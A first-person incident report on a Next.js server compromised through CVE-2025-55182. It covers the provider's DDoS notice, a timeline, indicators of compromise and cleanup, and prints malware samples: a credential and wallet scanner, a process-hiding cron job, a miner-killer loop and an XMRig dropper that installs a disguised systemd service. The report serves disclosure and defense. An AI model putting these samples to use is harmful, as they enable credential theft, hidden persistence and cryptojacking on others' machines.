Preview
Open Original
December 6, 2025
React CVE-2025-55182 Exploitation & Multi-Stage "Meshagent" Malware
Public Security Incident Report: React CVE-2025-55182 Exploitation
Date: December 6, 2025 Affected Service: Personal DigitalOcean droplet hosting multiple Next.js applications Attack Vector: CVE-2025-55182 (React Server Components RCE) Severity: Critical (CVSS 10.0)
Executive Summary
On December 6, 2025, I discovered my DigitalOcean droplet had been compromised following exploitation of CVE-2025-55182 , a critical remote code execution vulnerability in React Server Components. The attack occurred within 24 hours of the public CVE disclosure, highlighting the importance of immediate security patching.
Digital Ocean Abuse Email:
Hi,
We are writing ...December 6, 2025
React CVE-2025-55182 Exploitation & Multi-Stage "Meshagent" Malware
Public Security Incident Report: React CVE-2025-55182 Exploitation
Date: December 6, 2025 Affected Service: Personal DigitalOcean droplet hosting multiple Next.js applications Attack Vector: CVE-2025-55182 (React Server Components RCE) Severity: Critical (CVSS 10.0)
Executive Summary
On December 6, 2025, I discovered my DigitalOcean droplet had been compromised following exploitation of CVE-2025-55182 , a critical remote code execution vulnerability in React Server Components. The attack occurred within 24 hours of the public CVE disclosure, highlighting the importance of immediate security patching.
Digital Ocean Abuse Email:
Hi,
We are writing to let you know that your Droplet asleepace-droplet at 192.241.216.26 was identified contributing 295.4 Mbps out of total 109.2 Gbps Distributed Denial of Service attack from 327 droplet(s) on our network aimed at 42.193.120.89.
Details of the Attack:-
Source IP:- 192.241.216.26
Total traffic used in attack:- 109.2 Gbps
asleepace-droplet contribution in attack:- 295.4 Mbps
Target of attack:- 42.193.120.89
Total Number of Droplets involved:- 327
The network traffic from your Droplet matches a pattern of malicious traffic originating from other Droplets targeted at a specific victim. If this traffic wasn’t intentional, it’s very likely your droplet has been compromised and is being used in Distributed Denial of Service attacks. Future reports for additional DDoS activity may require us to temporarily disconnect your droplet from the network to prevent additional abuse.
Your path to resolution will be influenced by how you use asleepace-droplet, your technical expertise, and/or your time available for investigation.
Path 1 - If asleepace-droplet does not collect or contain any data you need to preserve, we suggest destroying this Droplet and starting over. This is the most straightforward way to get back up and running. Please note, you will still be billed for your Droplet usage, even in a network disconnected state.
Path 2 - If asleepace-droplet stores data you need to recover, please follow our recovery checklist on https://www.digitalocean.com/docs/droplets/resources/recovery-iso/ before destroying this Droplet and starting over. This is the best path if you do not wish to attempt recovery of your Droplet, but do need to recover data from it before destroying it.
Path 3 - If you are confident in your technical ability and want to troubleshoot, identify, and triage the problem on your own, we do have a resource available at https://www.digitalocean.com/docs/droplets/resources/ddos/ that includes some suggestions.
We would also like to make sure you're aware of a few things before you begin taking any of the above steps, as they may help guide you to the correct choice in this issue.
First, as this indicates a high probability that your Droplet has been compromised, please be aware that merely changing passwords or adding a firewall rule or any other form of access control won’t resolve this issue, as your Droplet has already been compromised. A malicious attacker has installed software on your Droplet, which was then used to launch this attack.
Finally, as a self-managed provider, we cannot access customer Droplets at the command line or application level. This means we can only provide you guidance from the information you give us about your Droplet server in regards to error logs, configuration files, or the output of commands.
If you believe this is a false positive, get stuck, or have a question please do not hesitate to reply to this email to get more support!
Best,
Security Operations Center
DigitalOcean
This report documents the attack timeline, malware analysis, and remediation steps to help others identify and respond to similar compromises.
Timeline
| Date/Time | Event |
|---|---|
| Dec 3, 2025 | CVE-2025-55182 publicly disclosed by React team |
| Dec 4, 00:20 UTC | Server compromised via vulnerable Next.js 15.0.3 application |
| Dec 4-6 | Attackers conducted reconnaissance and deployed multiple malware families |
| Dec 6, 2025 | Compromise discovered via DigitalOcean DDoS abuse notification |
| Dec 6, 23:00 UTC | Malware removal and patching completed |
Vulnerability Details
CVE-2025-55182 - React Server Components Remote Code Execution
-
CVSS Score: 10.0 (Critical)
-
Affected Versions: Next.js using React 19.0.0 - 19.2.0
-
Vulnerable Packages:
-
react-server-dom-webpack -
react-server-dom-parcel -
react-server-dom-turbopack
My Vulnerable Stack:
- Next.js 15.0.3
- React 19.0.0-rc-66855b96-20241106
- Running on Ubuntu 24.04 LTS
Patched To:
- Next.js 15.0.5+
- React 19.2.1+
Attack Analysis
Entry Point
The attackers exploited the React RCE vulnerability in my Next.js application to gain initial code execution. No authentication was required.
Malware Deployed
I discovered five distinct malware families on the compromised server:
1. Credential Harvesting Script
A comprehensive scanner targeting:
.envfiles (50+ filename variations)- Crypto wallet files and private keys
- API keys (GitHub, Stripe, OpenAI, etc.)
- Database credentials
- Session tokens
Evidence of exfiltration:
{"destination":"_root_smart-contracts_frontend_.env.local","success":true}
2. MeshAgent RAT (Remote Access Trojan)
- Purpose: Persistent remote access
- Persistence: systemd service + cron job
- Stealth: Process hiding via
/procbind mounts - Detection evasion: Hidden from
ps,top,htop
Cron job (ran every minute):
pgrep -f meshagent | while read pid; do
mount -o bind /tmp/empty /proc/$pid 2>/dev/null
done
3. DDoS Botnet Client
- Binary name:
fghgf(obfuscated) - Attack contribution: 295.4 Mbps (part of 109.2 Gbps attack)
- Total infected servers: 327 DigitalOcean droplets
- Target: IP address in China
4. Anti-Competitive Script
A script that killed competing malware (especially crypto miners) to preserve resources:
while true; do
# Kill XMRig and other miners
pgrep xmrig && pkill -9 xmrig
sleep 45
done
5. XMRig Monero Miner (Attempted)
- Status: Dropper found but not executed (caught in time)
- Target: Monero (XMR) cryptocurrency mining
- Pool: pool.hashvault.pro:443
- Disguise: Masqueraded as “system-update-service” systemd unit
Detection Indicators
How I Discovered the Compromise
- DigitalOcean Abuse Email - DDoS participation notification
- Suspicious Processes:
meshagent
fghgf
ci87vl87hn87lju2
[kswapd0] (fake kernel process)
- Unusual Cron Jobs:
crontab -l # Revealed meshagent hiding script
- Suspicious Files:
/tmp/find.sh (36KB credential scanner)
/dev/x86 (UPX-packed malware)
/dev/health.sh (miner killer)
Key Indicators of Compromise (IoCs)
Files to check:
/tmp/fghgf
/tmp/meshagent*
/tmp/find.sh
/tmp/.del
/dev/x86
/dev/health.sh
/usr/local/mesh_services/
Processes:
ps aux | grep -E "meshagent|fghgf|ci87"
Network connections:
netstat -tupn | grep ESTABLISHED
# Look for unknown IPs, especially mining pools
Crontabs:
crontab -l
sudo cat /etc/crontab
sudo ls /var/spool/cron/crontabs/
Systemd services:
systemctl list-units --type=service | grep -v "systemd\|ssh\|nginx"
# Look for suspicious service names like "system-update-service"
Immediate Actions Taken
- Killed Malicious Processes:
sudo pkill -9 meshagent
sudo pkill -9 fghgf
sudo pkill -9 xmrig
- Removed Malware:
sudo rm -rf /tmp/meshagent* /tmp/fghgf /tmp/find.sh
sudo rm -rf /dev/x86 /dev/health.sh
sudo rm -rf /usr/local/mesh_services/
- Removed Persistence:
crontab -r
sudo systemctl disable meshagent
sudo rm /usr/lib/systemd/system/meshagent.service
sudo systemctl daemon-reload
- Patched Vulnerability:
npm install next@15.0.5 react@latest react-dom@latest
npm run build
# Restart application
- Rotated Compromised Credentials:
- Database passwords
- API keys
- OAuth secrets
- Session tokens
Security Hardening
# Install fail2ban
sudo apt install fail2ban -y
# Configure firewall
sudo ufw allow 22/tcp
sudo ufw allow 80/tcp
sudo ufw allow 443/tcp
sudo ufw enable
# Restrict database to localhost
sudo nano /etc/postgresql/*/main/postgresql.conf
# Set: listen_addresses = 'localhost'
Lessons Learned
1. Patch Immediately for Critical CVEs
The attack occurred 24 hours after disclosure. For CVSS 10.0 vulnerabilities:
- Subscribe to security advisories
- Patch within hours, not days
- Consider automated dependency updates (Dependabot)
2. Defense in Depth
A single vulnerability led to complete compromise. Implement:
- Web Application Firewall (WAF)
- Intrusion Detection System (IDS)
- Host-based firewall
- File integrity monitoring
3. Monitoring is Critical
The compromise went undetected for 2+ days. Implement:
- Log aggregation and alerting
- Process monitoring
- Network traffic analysis
- File integrity checks (AIDE, Tripwire)
4. Assume Breach
Once discovered:
- Rotate ALL credentials immediately
- Review all access logs
- Consider full system rebuild
- Don’t trust “cleanup” - malware may have backdoors
Recommendations for Next.js Users
Immediate Actions
- Check Your Version:
cat package.json | grep '"next"'
- If Vulnerable (Next.js < 15.0.5), Update NOW:
npm install next@15.0.5 react@latest react-dom@latest
npm run build
# Restart your application
- Scan for Compromise:
# Check for suspicious processes
ps aux | grep -E "meshagent|xmrig|fghgf"
# Check cron jobs
crontab -l
# Check for malware files
sudo find /tmp /dev -type f -executable -mtime -7
Long-term Security
- Enable automated security updates
- Implement log monitoring (ELK stack, Datadog, etc.)
- Use a process manager with monitoring (PM2, systemd)
- Regular security audits
- Principle of least privilege (don’t run apps as root)
Malware Samples
Below are snippets of some of the discovered Malware related to the incident:
Malware Sample 1: Credential Harvesting Script
# Malware Sample 1: Credential Harvesting Script
# File: find.sh
# Size: ~36KB
# Purpose: Scan filesystem for credentials and exfiltrate via curl
#!/bin/bash
# ============================================
# Sensitive Config File Search Script
# Search config/env files and wallet/web3 configs
# ============================================
# Color definitions
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color
# Default search path
SEARCH_PATH="${1:-.}"
# Log file with timestamp
TIMESTAMP=$(date +"%Y%m%d_%H%M%S")
LOG_FILE="web3_scan_${TIMESTAMP}.log"
# Log function (console + file)
log() {
echo -e "$1"
echo -e "$1" | sed 's/\x1b\[[0-9;]*m//g' >> "$LOG_FILE"
}
log "${CYAN}============================================${NC}"
log "${CYAN} Web3/Wallet/Blockchain Config Scanner${NC}"
log "${CYAN}============================================${NC}"
log "${YELLOW}Search Path: ${SEARCH_PATH}${NC}"
log "${YELLOW}Log File: ${LOG_FILE}${NC}"
log "Scan Time: $(date)"
log ""
# ============================================
# 1. Search ENV files
# ============================================
log "${GREEN}[1] Search ENV Files${NC}"
log "----------------------------------------"
ENV_PATTERNS=(
".env"
".env.*"
"*.env"
".env.local"
".env.development"
".env.production"
".env.example"
".envrc"
)
# Exclude system/cache directories (Linux)
EXCLUDES="/proc|/sys|/dev|/run|/snap|/boot|/lib|/lib64|/usr/lib|/usr/share|/var/lib|/var/cache|/var/log|node_modules|\.git|\.cache|__pycache__|\.npm|\.yarn|\.nvm|vendor|\.local/share|\.vscode|\.config/chromium|\.mozilla"
for pattern in "${ENV_PATTERNS[@]}"; do
results=$(find "$SEARCH_PATH" -type f -iname "$pattern" 2>/dev/null | grep -Ev "$EXCLUDES")
if [ -n "$results" ]; then
log "${BLUE}Pattern: $pattern${NC}"
echo "$results" | while read -r file; do
log " -> $file"
done
fi
done
log ""
# ============================================
# 2. Search Wallet/Web3/Blockchain Files
# ============================================
log "${GREEN}[2] Search Wallet/Web3/Blockchain Files${NC}"
log "----------------------------------------"
WALLET_WEB3_PATTERNS=(
# Wallet/Key files
"*wallet*"
"*keystore*"
"*keystores*"
"*private*key*"
"*privatekey*"
"*secret*"
"*mnemonic*"
"*seed*phrase*"
"*credentials*"
# Web3 frameworks
"*web3*"
"*ethers*"
"*hardhat*"
"*truffle*"
"*foundry*"
"*brownie*"
"*ganache*"
"*remix*"
# Wallet apps
"*metamask*"
"*phantom*"
"*rabby*"
"*trustwallet*"
"*ledger*"
"*trezor*"
# Blockchain providers
"*infura*"
"*alchemy*"
"*moralis*"
"*quicknode*"
"*chainstack*"
# Blockchain config
"*blockchain*"
"*contract*"
"*deploy*"
"*ethereum*"
# EVM chains
"*mainnet*"
"*testnet*"
"*goerli*"
"*sepolia*"
"*bsc*"
"*polygon*"
"*arbitrum*"
"*optimism*"
"*avalanche*"
"*fantom*"
"*cronos*"
"*base*"
"*zksync*"
"*linea*"
# Solana ecosystem
"*solana*"
"*anchor*"
"*spl-token*"
# Other L1
"*cosmos*"
"*polkadot*"
"*near*"
"*aptos*"
"*sui*"
"*ton*"
"*tron*"
# DeFi
"*uniswap*"
"*pancakeswap*"
"*aave*"
"*compound*"
"*curve*"
"*dex*"
"*swap*"
"*liquidity*"
"*staking*"
# NFT
"*nft*"
"*opensea*"
"*ipfs*"
)
for pattern in "${WALLET_WEB3_PATTERNS[@]}"; do
results=$(find "$SEARCH_PATH" -type f -iname "$pattern" 2>/dev/null | grep -Ev "$EXCLUDES")
if [ -n "$results" ]; then
log "${BLUE}Pattern: $pattern${NC}"
echo "$results" | while read -r file; do
log " -> $file"
done
fi
done
log ""
# ============================================
# 3. Search Sensitive Content Keywords
# ============================================
log "${GREEN}[3] Search Sensitive Content Keywords${NC}"
log "----------------------------------------"
# Define sensitive keywords (Web3/Wallet/Blockchain/Database/Payment focused)
SENSITIVE_KEYWORDS=(
# ========== Wallet/Private Key ==========
"PRIVATE_KEY"
"PRIVATEKEY"
"PRIV_KEY"
"PRIVKEY"
"SECRET_KEY"
"SECRETKEY"
"MNEMONIC"
"SEED_PHRASE"
"SEEDPHRASE"
"RECOVERY_PHRASE"
"BACKUP_PHRASE"
"WALLET_SECRET"
"WALLET_KEY"
"KEYSTORE"
"KEY_STORE"
"PASSPHRASE"
"PASS_PHRASE"
"HD_WALLET"
"BIP39"
"BIP44"
"DERIVATION_PATH"
# ========== Web3/Blockchain RPC ==========
"RPC_URL"
"RPC_ENDPOINT"
"RPC_KEY"
"WEB3_PROVIDER"
"WEB3_URL"
"PROVIDER_URL"
"NODE_URL"
"NODE_KEY"
"BLOCKCHAIN_URL"
"CHAIN_RPC"
"CHAIN_ID"
"NETWORK_URL"
"MAINNET_RPC"
"MAINNET_URL"
"TESTNET_RPC"
"TESTNET_URL"
"WSS_URL"
"WSS_ENDPOINT"
"WEBSOCKET_URL"
"JSON_RPC"
# ========== Blockchain Provider API ==========
"INFURA_KEY"
"INFURA_API"
"INFURA_SECRET"
"INFURA_PROJECT"
"INFURA_ID"
"ALCHEMY_KEY"
"ALCHEMY_API"
"ALCHEMY_URL"
"ALCHEMY_SECRET"
"MORALIS_KEY"
"MORALIS_API"
"MORALIS_SECRET"
"QUICKNODE_KEY"
"QUICKNODE_URL"
"ANKR_KEY"
"ANKR_API"
"CHAINSTACK_KEY"
"GETBLOCK_KEY"
"NODEREAL_KEY"
"BLOCKDAEMON_KEY"
"POKT_KEY"
"BLAST_API"
"GROVE_KEY"
# ========== Smart Contract Deploy ==========
"DEPLOYER_PRIVATE"
"DEPLOYER_KEY"
"DEPLOYER_ADDRESS"
"OWNER_PRIVATE"
"OWNER_KEY"
"ADMIN_PRIVATE"
"ADMIN_KEY"
"SIGNER_KEY"
"SIGNER_PRIVATE"
"OPERATOR_KEY"
"RELAYER_KEY"
"HOT_WALLET"
"COLD_WALLET"
"CONTRACT_ADDRESS"
"CONTRACT_OWNER"
"PROXY_ADMIN"
"IMPLEMENTATION"
"VERIFIED_CONTRACT"
# ========== Block Explorer API ==========
"ETHERSCAN_API"
"ETHERSCAN_KEY"
"BSCSCAN_API"
"BSCSCAN_KEY"
"POLYGONSCAN_API"
"POLYGONSCAN_KEY"
"ARBISCAN_API"
"ARBISCAN_KEY"
"SNOWTRACE_API"
"FTMSCAN_API"
"OPTIMISM_API"
"BASESCAN_API"
"CELOSCAN_API"
"CRONOSCAN_API"
"MOONSCAN_API"
"EXPLORER_API"
# ========== Wallet Address ==========
"WALLET_ADDRESS"
"WALLET_ADDR"
"FROM_ADDRESS"
"TO_ADDRESS"
"SENDER_ADDRESS"
"RECEIVER_ADDRESS"
"RECIPIENT"
"TREASURY"
"TREASURY_ADDRESS"
"FEE_RECIPIENT"
"FEE_ADDRESS"
"MULTISIG"
"MULTISIG_ADDRESS"
"SAFE_ADDRESS"
"GNOSIS_SAFE"
"VAULT_ADDRESS"
# ========== Exchange API (CEX) ==========
"BINANCE_API"
"BINANCE_SECRET"
"BINANCE_KEY"
"COINBASE_API"
"COINBASE_SECRET"
"COINBASE_KEY"
"KRAKEN_API"
"KRAKEN_SECRET"
"HUOBI_API"
"HUOBI_SECRET"
"OKX_API"
"OKX_SECRET"
"OKEX_API"
"KUCOIN_API"
"KUCOIN_SECRET"
"BYBIT_API"
"BYBIT_SECRET"
"GATE_API"
"GATE_SECRET"
"BITGET_API"
"BITGET_SECRET"
"MEXC_API"
"MEXC_SECRET"
"DERIBIT_API"
"BITFINEX_API"
"GEMINI_API"
"CRYPTO_COM_API"
"EXCHANGE_KEY"
"EXCHANGE_SECRET"
"TRADING_KEY"
"TRADING_SECRET"
"CEX_API"
"CEX_SECRET"
# ========== DeFi Protocol ==========
"UNISWAP_KEY"
"PANCAKE_KEY"
"SUSHISWAP_KEY"
"AAVE_KEY"
"COMPOUND_KEY"
"CURVE_KEY"
"BALANCER_KEY"
"1INCH_API"
"ONEINCH_API"
"PARASWAP_API"
"0X_API"
"ZEROX_API"
"DEX_API"
"ROUTER_ADDRESS"
"FACTORY_ADDRESS"
"POOL_ADDRESS"
"LP_TOKEN"
"FLASH_LOAN"
"SLIPPAGE"
# ========== NFT/IPFS ==========
"OPENSEA_API"
"OPENSEA_KEY"
"RARIBLE_API"
"BLUR_API"
"NFT_STORAGE"
"IPFS_KEY"
"IPFS_SECRET"
"PINATA_API"
"PINATA_SECRET"
"PINATA_JWT"
"WEB3_STORAGE"
"FILECOIN_KEY"
"ARWEAVE_KEY"
"METADATA_URI"
"BASE_URI"
"TOKEN_URI"
# ========== Bridge/Cross-chain ==========
"BRIDGE_KEY"
"BRIDGE_API"
"LAYERZERO"
"STARGATE"
"WORMHOLE"
"AXELAR"
"MULTICHAIN"
"CELER"
"HOP_PROTOCOL"
"ACROSS"
"SYNAPSE"
# ========== Oracle ==========
"CHAINLINK_KEY"
"CHAINLINK_NODE"
"ORACLE_KEY"
"PRICE_FEED"
"DATA_FEED"
"BAND_PROTOCOL"
"PYTH_KEY"
"API3_KEY"
# ========== L2/Rollup ==========
"OPTIMISM_KEY"
"ARBITRUM_KEY"
"ZKSYNC_KEY"
"STARKNET_KEY"
"POLYGON_KEY"
"BASE_KEY"
"LINEA_KEY"
"SCROLL_KEY"
"MANTLE_KEY"
"BLAST_KEY"
"MODE_KEY"
"ROLLUP_KEY"
"SEQUENCER"
# ========== Solana Ecosystem ==========
"SOLANA_PRIVATE"
"SOLANA_KEY"
"SOLANA_RPC"
"PHANTOM_KEY"
"ANCHOR_WALLET"
"SPL_TOKEN"
"METAPLEX_KEY"
"HELIUS_API"
"HELIUS_KEY"
"SHYFT_API"
"TRITON_KEY"
"JUPITER_API"
"RAYDIUM_KEY"
"ORCA_KEY"
"MARINADE_KEY"
# ========== Other L1 Chains ==========
"COSMOS_KEY"
"COSMOS_MNEMONIC"
"POLKADOT_KEY"
"NEAR_KEY"
"NEAR_PRIVATE"
"APTOS_KEY"
"APTOS_PRIVATE"
"SUI_KEY"
"SUI_PRIVATE"
"TON_KEY"
"TON_MNEMONIC"
"TRON_KEY"
"TRON_PRIVATE"
"AVAX_KEY"
"FTM_KEY"
"CELO_KEY"
"HARMONY_KEY"
"KLAYTN_KEY"
"AURORA_KEY"
# ========== Database Credentials ==========
"DB_PASSWORD"
"DB_PASS"
"DB_USER"
"DB_HOST"
"DATABASE_PASSWORD"
"DATABASE_URL"
"DATABASE_URI"
"MYSQL_PASSWORD"
"MYSQL_ROOT"
"POSTGRES_PASSWORD"
"POSTGRES_USER"
"PG_PASSWORD"
"MONGO_PASSWORD"
"MONGO_USER"
"MONGODB_URI"
"MONGODB_URL"
"REDIS_PASSWORD"
"REDIS_URL"
"REDIS_AUTH"
"CONNECTION_STRING"
"SQL_PASSWORD"
"SUPABASE_KEY"
"SUPABASE_URL"
# ========== Payment Services ==========
"STRIPE_KEY"
"STRIPE_SECRET"
"STRIPE_WEBHOOK"
"STRIPE_API"
"PAYPAL_SECRET"
"PAYPAL_CLIENT"
"PAYPAL_KEY"
"PAYMENT_KEY"
"PAYMENT_SECRET"
"MERCHANT_KEY"
"MERCHANT_ID"
"CHECKOUT_KEY"
"RAZORPAY_KEY"
"RAZORPAY_SECRET"
"SQUARE_KEY"
"ADYEN_KEY"
"BRAINTREE_KEY"
"COINPAYMENTS_KEY"
"NOWPAYMENTS_KEY"
"BITPAY_KEY"
"CRYPTO_PAY"
# ========== Bot/Automation ==========
"BOT_TOKEN"
"BOT_SECRET"
"TELEGRAM_BOT"
"TELEGRAM_TOKEN"
"DISCORD_BOT"
"DISCORD_TOKEN"
"DISCORD_WEBHOOK"
"SLACK_BOT"
"SLACK_TOKEN"
"TWITTER_API"
"TWITTER_BEARER"
# ========== Regex Patterns ==========
"0x[a-fA-F0-9]{64}" # Ethereum private key (64 hex)
"0x[a-fA-F0-9]{40}" # Ethereum address (40 hex)
"[1-9A-HJ-NP-Za-km-z]{87,88}" # Solana private key (base58)
"[1-9A-HJ-NP-Za-km-z]{43,44}" # Solana address (base58)
"-----BEGIN.*PRIVATE" # PEM private key header
)
log "${YELLOW}Searching files with sensitive keywords...${NC}"
for keyword in "${SENSITIVE_KEYWORDS[@]}"; do
results=$(grep -ril "$keyword" "$SEARCH_PATH" 2>/dev/null | grep -Ev "$EXCLUDES" | grep -v "\.min\." | head -50)
if [ -n "$results" ]; then
log "${RED}Keyword: $keyword${NC}"
echo "$results" | while read -r file; do
log " -> $file"
done
fi
done
log ""
# ============================================
# 4. Output Summary
# ============================================
log "${CYAN}============================================${NC}"
log "${CYAN} Search Complete - Summary${NC}"
log "${CYAN}============================================${NC}"
total_env=$(find "$SEARCH_PATH" -type f \( -iname ".env*" -o -iname "*.env" \) 2>/dev/null | grep -Ev "$EXCLUDES" | wc -l)
total_wallet=$(find "$SEARCH_PATH" -type f \( -iname "*wallet*" -o -iname "*keystore*" -o -iname "*private*key*" -o -iname "*mnemonic*" \) 2>/dev/null | grep -Ev "$EXCLUDES" | wc -l)
total_web3=$(find "$SEARCH_PATH" -type f \( -iname "*web3*" -o -iname "*ethereum*" -o -iname "*hardhat*" -o -iname "*truffle*" \) 2>/dev/null | grep -Ev "$EXCLUDES" | wc -l)
log "Env files: ${GREEN}$total_env${NC}"
log "Wallet-related: ${RED}$total_wallet${NC}"
log "Web3/Blockchain: ${YELLOW}$total_web3${NC}"
log ""
log "${CYAN}Results saved to: ${LOG_FILE}${NC}"
log "${YELLOW}Warning: Please review highlighted files to ensure sensitive data is secure!${NC}"
Malware Sample 2: MeshAgent Process Hiding Cron Job
# Malware Sample 2: MeshAgent Process Hiding Cron Job
# Installed in: User crontab
# Execution: Every minute
* * * * * pgrep -f meshagent | while read pid; do mountpoint -q /proc/$pid || mount -o bind /tmp/empty /proc/$pid 2>/dev/null; done
Malware Sample 3: Crypto Miner Killer Script
# Malware Sample 3: Crypto Miner Killer Script
# File: /dev/health.sh
# Purpose: Kill competing malware to preserve resources
#!/bin/bash
while true; do
for proc_dir in /proc/[0-9]*; do
pid=${proc_dir##*/}
if strings "/proc/$pid/exe" 2>/dev/null | grep -q xmrig; then
kill -9 "$pid"
continue
fi
result=$(ls -l "/proc/$pid/exe" 2>/dev/null)
case "$result" in
*"(deleted)"* | *"xmrig"* | *"watcher"* | *"/tmp/a"* | *"softirq"* | *"rondo"*)
kill -9 "$pid"
;;
esac
done
sleep 45
done
Malware Sample 4: XMRig Monero Miner Dropper
NOTE: This appears to be a separate malware family, though deployed during the same compromise. It was found but not executed.
# Malware Sample 4: XMRig Monero Miner Dropper
# File: sex.sh
# Status: Found but not executed (caught before installation)
#!/bin/bash
# Configuration
TAR_FILE="kal.tar.gz"
EXTRACT_DIR="xmrig-6.24.0"
BINARY_PATH="$(pwd)/$EXTRACT_DIR/xmrig"
ARGS="--url pool.hashvault.pro:443 --user 89ASvi6ZBHXE6ykUZZFtqE1QqVhmwxCDCUvW2jvGZy1yP6n34uNdMKYj54ck81UC87KAKLaZT2L4YfC85ZCePDVeQPWoeAq --pass ZOVDC --donate-level 0 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14"
SERVICE_NAME="system-update-service"
# Download and setup if not already present
if [ ! -f "$BINARY_PATH" ]; then
curl -L -o "$TAR_FILE" --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-linux-static-x64.tar.gz
tar xvzf "$TAR_FILE"
fi
chmod +x "$BINARY_PATH"
# Attempt systemd setup
INSTALLED_SYSTEMD=0
if [ "$(id -u)" -eq 0 ] && command -v systemctl >/dev/null 2>&1; then
echo "Root privileges detected. Attempting systemd setup..."
SERVICE_FILE="/etc/systemd/system/${SERVICE_NAME}.service"
cat <<EOF > "$SERVICE_FILE"
[Unit]
Description=System Update Service
After=network.target
[Service]
Type=simple
ExecStart=${BINARY_PATH} ${ARGS}
Restart=always
RestartSec=10
User=root
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable "$SERVICE_NAME"
systemctl start "$SERVICE_NAME"
if systemctl is-active --quiet "$SERVICE_NAME"; then
echo "Service started via systemd."
INSTALLED_SYSTEMD=1
fi
fi
# Fallback to nohup
if [ $INSTALLED_SYSTEMD -eq 0 ]; then
echo "Starting with nohup..."
nohup "$BINARY_PATH" $ARGS >/dev/null 2>&1 &
fi
File Hashes for Threat Intelligence
Malware Binaries:
MD5: 3ba4d5e0cf0557f03ee5a97a2de56511 (/dev/x86)
Monero Wallet (for blocking):
89ASvi6ZBHXE6ykUZZFtqE1QqVhmwxCDCUvW2jvGZy1yP6n34uNdMKYj54ck81UC87KAKLaZT2L4YfC85ZCePDVeQPWoeAq
Mining Pool:
pool.hashvault.pro:443
Additional Resources
- React Security Advisory: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
- Next.js Update Guide: https://nextjs.org/docs/upgrading
- NIST CVE Database: https://nvd.nist.gov/vuln/detail/CVE-2025-55182
Conclusion
This incident demonstrates the critical importance of rapid security patching. Attackers are actively scanning for and exploiting newly disclosed vulnerabilities within hours of public disclosure.
If you’re running Next.js or React Server Components, check your versions immediately and update if vulnerable. The exploitation is trivial and widespread.
Stay safe out there. 🔒
Disclosure: This report describes a real security incident on my personal infrastructure. All sensitive credentials mentioned in this report have been rotated. Technical details are shared to help the community defend against similar attacks.
Questions? Feel free to reach out or open an issue if you’ve experienced similar compromise.
Last Updated: December 6, 2025